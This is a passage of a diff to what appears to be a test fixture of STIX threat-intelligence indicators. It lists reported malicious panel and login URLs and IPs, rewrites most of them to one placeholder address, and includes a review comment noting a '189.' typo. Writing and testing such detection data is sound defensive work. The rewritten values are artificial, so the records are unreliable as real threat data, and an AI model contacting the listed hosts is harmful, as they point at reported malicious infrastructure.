Ltd.; Source: CyberCrime","id":"indicator--d5c7a00c-4ab5-4501-b79c-4e96838e5602","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-79"],"modified":"2020-02-06T02:10:23.024Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-06T02:10:23.024Z"} {"created":"2020-02-06T02:10:35.597Z","description":"TS ID: 55290730780; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--524c1a55-264d-4f41-a854-1f0601921675","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-06T02:10:35.597Z","name":"mal_url: http://f0378370.xsph.ru/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0378370.xsph.ru/panel/admin.php']","type":"indicator","valid_from":"2020-02-06T02:10:35.597Z"} -{"created":"2020-02-06T02:10:59.132Z","description":"TS ID: 55290730787; iType: mal_url; State: active; Org: N-b Tv Sat Srl; Source: CyberCrime","id":"indicator--d8d588e2-5ab4-4937-9051-ae93e79c0204","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-92"],"modified":"2020-02-06T02:10:59.132Z","name":"mal_url: http://85.204.116.145/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://85.204.116.145/login']","type":"indicator","valid_from":"2020-02-06T02:10:59.132Z"} +{"created":"2020-02-06T02:10:59.132Z","description":"TS ID: 55290730787; iType: mal_url; State: active; Org: N-b Tv Sat Srl; Source: CyberCrime","id":"indicator--d8d588e2-5ab4-4937-9051-ae93e79c0204","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-92"],"modified":"2020-02-06T02:10:59.132Z","name":"mal_url: 
http://89.160.20.156/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/login']","type":"indicator","valid_from":"2020-02-06T02:10:59.132Z"} {"created":"2020-02-06T02:11:08.205Z","description":"TS ID: 55290730776; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--6b38040c-6578-43c4-8cec-a426d1079a96","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-02-06T02:11:08.205Z","name":"mal_url: http://f0396918.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0396918.xsph.ru/login']","type":"indicator","valid_from":"2020-02-06T02:11:08.205Z"} {"created":"2020-02-06T02:11:15.653Z","description":"TS ID: 55290730807; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--22ba0c46-ef00-43cc-a2e1-ff75417cf11d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-06T02:11:15.653Z","name":"mal_url: http://gpi-q.com/cup/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://gpi-q.com/cup/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-06T02:11:15.653Z"} {"created":"2020-02-06T02:11:17.072Z","description":"TS ID: 55290730801; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--257bcf28-e6ee-46e8-b9fe-d192fdc7c959","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-06T02:11:17.072Z","name":"mal_url: http://l5056942.justinstalledpanel.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 
'http://l5056942.justinstalledpanel.com/login']","type":"indicator","valid_from":"2020-02-06T02:11:17.072Z"} 
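Review bot: Every indicator rewritten in this hunk (TS IDs 55287965589, 55290730789, 55290730784, 55290730808, 55290730787) now carries the identical address 89.160.20.156 in both `name` and `pattern`, so the fixture no longer holds two distinct mal_ip/mal_url values even though the records keep distinct `id`s and unrelated `Org` strings (Tencent, InMotion, Best-Hoster, N-b Tv Sat); if the pipeline or its expected output dedupes or keys on the indicator value, that coverage is lost and a second address from the same supported set would be worth keeping. The substitution also appears to have been applied per field rather than per record: further down the page, the record for TS ID 55295317581 (in the following hunk, which runs past the end of this view) has `"name":"mal_url: http://89.160.20.156/xcool!/admin.php"` but `"pattern":"[url:value = 'http://189.160.20.156/xcool!/admin.php']"`, a `189.` typo that leaves name and pattern disagreeing and reintroduces an address outside the intended set; the pattern should read `'http://89.160.20.156/xcool!/admin.php'`. Since the expected-output files for this data stream are presumably regenerated from these inputs, such a mismatch would be baked into the golden file rather than caught by the test, so a `grep -n 189.160.20.156` over the fixtures before regenerating is worthwhile.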
@@ -353,39 +353,39 @@ {"created":"2020-02-06T02:11:27.123Z","description":"TS ID: 55290730782; iType: mal_url; State: active; Org: Hotwire Fision; Source: CyberCrime","id":"indicator--29909afa-ad21-493c-b420-870dbc8dd0da","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-92"],"modified":"2020-02-06T02:11:27.123Z","name":"mal_url: http://tranpip.com/vla/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://tranpip.com/vla/panel/admin.php']","type":"indicator","valid_from":"2020-02-06T02:11:27.123Z"} {"created":"2020-02-06T02:11:37.189Z","description":"TS ID: 55290730803; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--eb5264f6-1f6e-4d1e-a813-d668ef8e6e0e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-93"],"modified":"2020-02-06T02:11:37.189Z","name":"mal_url: http://l1430a3c.justinstalledpanel.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://l1430a3c.justinstalledpanel.com/login']","type":"indicator","valid_from":"2020-02-06T02:11:37.189Z"} {"created":"2020-02-06T02:12:51.488Z","description":"TS ID: 55290730778; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--c5829f98-8034-4bab-b591-9d3fbda9f448","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-72"],"modified":"2020-02-06T02:12:51.488Z","name":"mal_url: http://f0391270.xsph.ru/dashboard/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0391270.xsph.ru/dashboard/admin.php']","type":"indicator","valid_from":"2020-02-06T02:12:51.488Z"} -{"created":"2020-02-06T02:12:52.562Z","description":"TS ID: 55290730800; iType: mal_url; State: active; Org: N-b Tv Sat Srl; 
Source: CyberCrime","id":"indicator--14575771-256c-4f2f-b4bc-7b96c6805b24","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-91"],"modified":"2020-02-06T02:12:52.562Z","name":"mal_url: http://85.204.116.144/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://85.204.116.144/login']","type":"indicator","valid_from":"2020-02-06T02:12:52.562Z"} +{"created":"2020-02-06T02:12:52.562Z","description":"TS ID: 55290730800; iType: mal_url; State: active; Org: N-b Tv Sat Srl; Source: CyberCrime","id":"indicator--14575771-256c-4f2f-b4bc-7b96c6805b24","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-91"],"modified":"2020-02-06T02:12:52.562Z","name":"mal_url: http://89.160.20.156/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/login']","type":"indicator","valid_from":"2020-02-06T02:12:52.562Z"} {"created":"2020-02-06T02:13:24.038Z","description":"TS ID: 55290730798; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--41ca379f-0e97-452f-bed7-0dcaa6509a87","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-92"],"modified":"2020-02-06T02:13:24.038Z","name":"mal_url: http://xmpzi.icu/blue/index.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://xmpzi.icu/blue/index.php']","type":"indicator","valid_from":"2020-02-06T02:13:24.038Z"} {"created":"2020-02-06T02:13:26.405Z","description":"TS ID: 55290730786; iType: mal_url; State: active; Org: QuadraNet; Source: CyberCrime","id":"indicator--5b354705-abe0-4b58-b088-aba7ddc92d6c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-35"],"modified":"2020-02-06T02:13:26.405Z","name":"mal_url: 
http://155.94.210.79/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://155.94.210.79/login']","type":"indicator","valid_from":"2020-02-06T02:13:26.405Z"} {"created":"2020-02-06T02:14:04.592Z","description":"TS ID: 55290730804; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--6f406e7c-e62d-4431-b7eb-d8bc42d48b54","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-91"],"modified":"2020-02-06T02:14:04.592Z","name":"mal_url: http://lf9a7e2b.justinstalledpanel.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://lf9a7e2b.justinstalledpanel.com/login']","type":"indicator","valid_from":"2020-02-06T02:14:04.592Z"} -{"created":"2020-02-06T02:14:13.434Z","description":"TS ID: 55290730806; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--1a0f27f7-a8a7-4dd5-b5cc-a7146221fc31","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-72"],"modified":"2020-02-06T02:14:13.434Z","name":"mal_url: http://5.188.60.16/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://5.188.60.16/login']","type":"indicator","valid_from":"2020-02-06T02:14:13.434Z"} -{"created":"2020-02-06T02:14:13.474Z","description":"TS ID: 55290730796; iType: mal_ip; State: active; Org: OVH SAS; Source: CyberCrime","id":"indicator--72bcbdc1-6c42-4fe9-b6b2-2a8519672418","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-16"],"modified":"2020-02-06T02:14:13.474Z","name":"mal_ip: 137.74.20.60","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '137.74.20.60']","type":"indicator","valid_from":"2020-02-06T02:14:13.474Z"} +{"created":"2020-02-06T02:14:13.434Z","description":"TS 
ID: 55290730806; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--1a0f27f7-a8a7-4dd5-b5cc-a7146221fc31","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-72"],"modified":"2020-02-06T02:14:13.434Z","name":"mal_url: http://89.160.20.156/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/login']","type":"indicator","valid_from":"2020-02-06T02:14:13.434Z"} +{"created":"2020-02-06T02:14:13.474Z","description":"TS ID: 55290730796; iType: mal_ip; State: active; Org: OVH SAS; Source: CyberCrime","id":"indicator--72bcbdc1-6c42-4fe9-b6b2-2a8519672418","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-16"],"modified":"2020-02-06T02:14:13.474Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-06T02:14:13.474Z"} {"created":"2020-02-06T02:14:13.506Z","description":"TS ID: 55290730793; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--a2c76402-f9d0-4ea1-9ed0-b035bce4c7a6","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-02-06T02:14:13.506Z","name":"mal_url: http://tikkies.eu/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://tikkies.eu/login']","type":"indicator","valid_from":"2020-02-06T02:14:13.506Z"} {"created":"2020-02-06T02:14:14.285Z","description":"TS ID: 55290730805; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--2e110e0c-f7af-4738-bed2-057bebad6f44","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-06T02:14:14.285Z","name":"mal_url: 
http://lb1a9935.justinstalledpanel.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://lb1a9935.justinstalledpanel.com/login']","type":"indicator","valid_from":"2020-02-06T02:14:14.285Z"} -{"created":"2020-02-06T02:14:30.841Z","description":"TS ID: 55290730788; iType: mal_url; State: active; Org: Cyber Wurx LLC; Source: CyberCrime","id":"indicator--20a1654d-6008-4d85-a2f0-cc9eaadabe43","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-23"],"modified":"2020-02-06T02:14:30.841Z","name":"mal_url: http://69.61.38.147/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://69.61.38.147/login']","type":"indicator","valid_from":"2020-02-06T02:14:30.841Z"} -{"created":"2020-02-07T01:58:49.531Z","description":"TS ID: 55295317584; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime","id":"indicator--e9848e5a-4cbf-4156-827d-b0e0e73d9f2e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-07T01:58:49.531Z","name":"mal_url: http://107.175.150.73/~giftioz/.golob/ds.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://107.175.150.73/~giftioz/.golob/ds.php']","type":"indicator","valid_from":"2020-02-07T01:58:49.531Z"} -{"created":"2020-02-07T01:58:49.782Z","description":"TS ID: 55295317585; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime","id":"indicator--44a6ba7f-2847-45c5-b4f3-452582094240","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-07T01:58:49.782Z","name":"mal_url: http://107.175.150.73/~giftioz/.jonovis/xr.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 
'http://107.175.150.73/~giftioz/.jonovis/xr.php']","type":"indicator","valid_from":"2020-02-07T01:58:49.782Z"} -{"created":"2020-02-07T01:59:00.621Z","description":"TS ID: 55295317581; iType: mal_url; State: active; Org: MVPS LTD; Source: CyberCrime","id":"indicator--dad51188-cf4b-4585-8fe2-bfeb4ab3a864","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-72"],"modified":"2020-02-07T01:59:00.621Z","name":"mal_url: http://194.32.79.80/xcool!/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://194.32.79.80/xcool!/admin.php']","type":"indicator","valid_from":"2020-02-07T01:59:00.621Z"} -{"created":"2020-02-07T02:01:59.646Z","description":"TS ID: 55295317582; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime","id":"indicator--a8895396-ac11-49f3-bb81-6e854b871870","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-07T02:01:59.646Z","name":"mal_url: http://107.175.150.73/~giftioz/.fotoci/ji.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://107.175.150.73/~giftioz/.fotoci/ji.php']","type":"indicator","valid_from":"2020-02-07T02:01:59.646Z"} -{"created":"2020-02-07T02:02:24.529Z","description":"TS ID: 55295317583; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime","id":"indicator--2d0ab756-16e3-4679-86d9-b5ef1bc14a32","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-07T02:02:24.529Z","name":"mal_url: http://107.175.150.73/~giftioz/.hokbi/cv.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://107.175.150.73/~giftioz/.hokbi/cv.php']","type":"indicator","valid_from":"2020-02-07T02:02:24.529Z"} -{"created":"2020-02-08T14:02:11.92Z","description":"TS ID: 55298072069; iType: 
mal_ip; State: active; Org: Best-Hoster Group Co. Ltd.; Source: CyberCrime","id":"indicator--0e0304f5-9735-4c6d-a860-95633369db34","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-22"],"modified":"2020-02-08T14:02:11.92Z","name":"mal_ip: 91.215.169.50","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '91.215.169.50']","type":"indicator","valid_from":"2020-02-08T14:02:11.92Z"} -{"created":"2020-02-08T14:02:14.399Z","description":"TS ID: 55298070452; iType: mal_ip; State: active; Org: Alibaba; Source: CyberCrime","id":"indicator--7af00858-9e0a-437b-af35-a4ef0b6527a5","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-58"],"modified":"2020-02-08T14:02:14.399Z","name":"mal_ip: 47.254.179.14","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '47.254.179.14']","type":"indicator","valid_from":"2020-02-08T14:02:14.399Z"} +{"created":"2020-02-06T02:14:30.841Z","description":"TS ID: 55290730788; iType: mal_url; State: active; Org: Cyber Wurx LLC; Source: CyberCrime","id":"indicator--20a1654d-6008-4d85-a2f0-cc9eaadabe43","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-23"],"modified":"2020-02-06T02:14:30.841Z","name":"mal_url: http://89.160.20.156/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/login']","type":"indicator","valid_from":"2020-02-06T02:14:30.841Z"} +{"created":"2020-02-07T01:58:49.531Z","description":"TS ID: 55295317584; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime","id":"indicator--e9848e5a-4cbf-4156-827d-b0e0e73d9f2e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-07T01:58:49.531Z","name":"mal_url: 
http://89.160.20.156/~giftioz/.golob/ds.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/~giftioz/.golob/ds.php']","type":"indicator","valid_from":"2020-02-07T01:58:49.531Z"} +{"created":"2020-02-07T01:58:49.782Z","description":"TS ID: 55295317585; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime","id":"indicator--44a6ba7f-2847-45c5-b4f3-452582094240","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-07T01:58:49.782Z","name":"mal_url: http://89.160.20.156/~giftioz/.jonovis/xr.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/~giftioz/.jonovis/xr.php']","type":"indicator","valid_from":"2020-02-07T01:58:49.782Z"} +{"created":"2020-02-07T01:59:00.621Z","description":"TS ID: 55295317581; iType: mal_url; State: active; Org: MVPS LTD; Source: CyberCrime","id":"indicator--dad51188-cf4b-4585-8fe2-bfeb4ab3a864","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-72"],"modified":"2020-02-07T01:59:00.621Z","name":"mal_url: http://89.160.20.156/xcool!/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://189.160.20.156/xcool!/admin.php']","type":"indicator","valid_from":"2020-02-07T01:59:00.621Z"} +{"created":"2020-02-07T02:01:59.646Z","description":"TS ID: 55295317582; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime","id":"indicator--a8895396-ac11-49f3-bb81-6e854b871870","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-07T02:01:59.646Z","name":"mal_url: http://89.160.20.156/~giftioz/.fotoci/ji.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 
'http://89.160.20.156/~giftioz/.fotoci/ji.php']","type":"indicator","valid_from":"2020-02-07T02:01:59.646Z"} +{"created":"2020-02-07T02:02:24.529Z","description":"TS ID: 55295317583; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime","id":"indicator--2d0ab756-16e3-4679-86d9-b5ef1bc14a32","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-07T02:02:24.529Z","name":"mal_url: http://89.160.20.156/~giftioz/.hokbi/cv.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/~giftioz/.hokbi/cv.php']","type":"indicator","valid_from":"2020-02-07T02:02:24.529Z"} +{"created":"2020-02-08T14:02:11.92Z","description":"TS ID: 55298072069; iType: mal_ip; State: active; Org: Best-Hoster Group Co. Ltd.; Source: CyberCrime","id":"indicator--0e0304f5-9735-4c6d-a860-95633369db34","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-22"],"modified":"2020-02-08T14:02:11.92Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-08T14:02:11.92Z"} +{"created":"2020-02-08T14:02:14.399Z","description":"TS ID: 55298070452; iType: mal_ip; State: active; Org: Alibaba; Source: CyberCrime","id":"indicator--7af00858-9e0a-437b-af35-a4ef0b6527a5","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-58"],"modified":"2020-02-08T14:02:14.399Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-08T14:02:14.399Z"} {"created":"2020-02-08T14:02:17.271Z","description":"TS ID: 55298068887; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: 
CyberCrime","id":"indicator--257cd2f9-ce06-4091-83e2-63d61b7e8bfa","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-02-08T14:02:17.271Z","name":"mal_url: http://smineolo39wings.in/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://smineolo39wings.in/login']","type":"indicator","valid_from":"2020-02-08T14:02:17.271Z"} {"created":"2020-02-08T14:02:23Z","description":"TS ID: 55298071788; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--8438ae84-2b7d-4fea-b1cd-fbec85ea3e58","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-79"],"modified":"2020-02-08T14:02:23Z","name":"mal_url: http://go.trust-oot.info/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://go.trust-oot.info/login']","type":"indicator","valid_from":"2020-02-08T14:02:23Z"} -{"created":"2020-02-08T14:02:23.507Z","description":"TS ID: 55298070914; iType: mal_url; State: active; Org: Digital Ocean; Source: CyberCrime","id":"indicator--7f6369a7-af79-45ca-96e4-3e5c309337de","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-24"],"modified":"2020-02-08T14:02:23.507Z","name":"mal_url: http://178.62.186.112/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://178.62.186.112/login']","type":"indicator","valid_from":"2020-02-08T14:02:23.507Z"} -{"created":"2020-02-08T14:02:23.547Z","description":"TS ID: 55298068879; iType: mal_ip; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--e1a9f3d2-0a84-4814-bac9-c9e60ad73cca","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-55"],"modified":"2020-02-08T14:02:23.547Z","name":"mal_ip: 
5.188.231.89","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '5.188.231.89']","type":"indicator","valid_from":"2020-02-08T14:02:23.547Z"} +{"created":"2020-02-08T14:02:23.507Z","description":"TS ID: 55298070914; iType: mal_url; State: active; Org: Digital Ocean; Source: CyberCrime","id":"indicator--7f6369a7-af79-45ca-96e4-3e5c309337de","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-24"],"modified":"2020-02-08T14:02:23.507Z","name":"mal_url: http://89.160.20.156/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/login']","type":"indicator","valid_from":"2020-02-08T14:02:23.507Z"} +{"created":"2020-02-08T14:02:23.547Z","description":"TS ID: 55298068879; iType: mal_ip; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--e1a9f3d2-0a84-4814-bac9-c9e60ad73cca","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-55"],"modified":"2020-02-08T14:02:23.547Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-08T14:02:23.547Z"} {"created":"2020-02-08T14:02:33.679Z","description":"TS ID: 55298069345; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--1aa4e592-6c78-43e8-b47c-2494a948d25c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-62"],"modified":"2020-02-08T14:02:33.679Z","name":"mal_url: http://f0391897.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0391897.xsph.ru/login']","type":"indicator","valid_from":"2020-02-08T14:02:33.679Z"} -{"created":"2020-02-08T14:02:53.996Z","description":"TS 
ID: 55298070323; iType: mal_ip; State: active; Org: Offshore Racks S.A; Source: CyberCrime","id":"indicator--0140ac57-a9a4-408a-9f53-f5b33f85dc80","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-21"],"modified":"2020-02-08T14:02:53.996Z","name":"mal_ip: 190.14.38.202","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '190.14.38.202']","type":"indicator","valid_from":"2020-02-08T14:02:53.996Z"} +{"created":"2020-02-08T14:02:53.996Z","description":"TS ID: 55298070323; iType: mal_ip; State: active; Org: Offshore Racks S.A; Source: CyberCrime","id":"indicator--0140ac57-a9a4-408a-9f53-f5b33f85dc80","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-21"],"modified":"2020-02-08T14:02:53.996Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-08T14:02:53.996Z"} {"created":"2020-02-08T14:02:57.507Z","description":"TS ID: 55298070037; iType: mal_url; State: active; Org: Avguro Technologies Ltd. 
Hosting service provider; Source: CyberCrime","id":"indicator--46c21251-c655-40c1-896d-2f4712091b7b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-68"],"modified":"2020-02-08T14:02:57.507Z","name":"mal_url: http://nikitakoteqka1.myjino.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://nikitakoteqka1.myjino.ru/login']","type":"indicator","valid_from":"2020-02-08T14:02:57.507Z"} {"created":"2020-02-08T14:02:59.236Z","description":"TS ID: 55298072047; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--7921e9e8-393c-4b0d-888f-bea034112f06","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-08T14:02:59.236Z","name":"mal_url: http://xgkxc.xyz/P1/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://xgkxc.xyz/P1/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-08T14:02:59.236Z"} {"created":"2020-02-08T14:02:59.246Z","description":"TS ID: 55298071436; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--a59774c5-c288-44a0-9eab-28d93c5d0ab4","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-08T14:02:59.246Z","name":"mal_url: http://100stuff.site/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://100stuff.site/login']","type":"indicator","valid_from":"2020-02-08T14:02:59.246Z"} -{"created":"2020-02-08T14:02:59.31Z","description":"TS ID: 55298071076; iType: mal_ip; State: active; Org: RouteLabel V.O.F.; Source: 
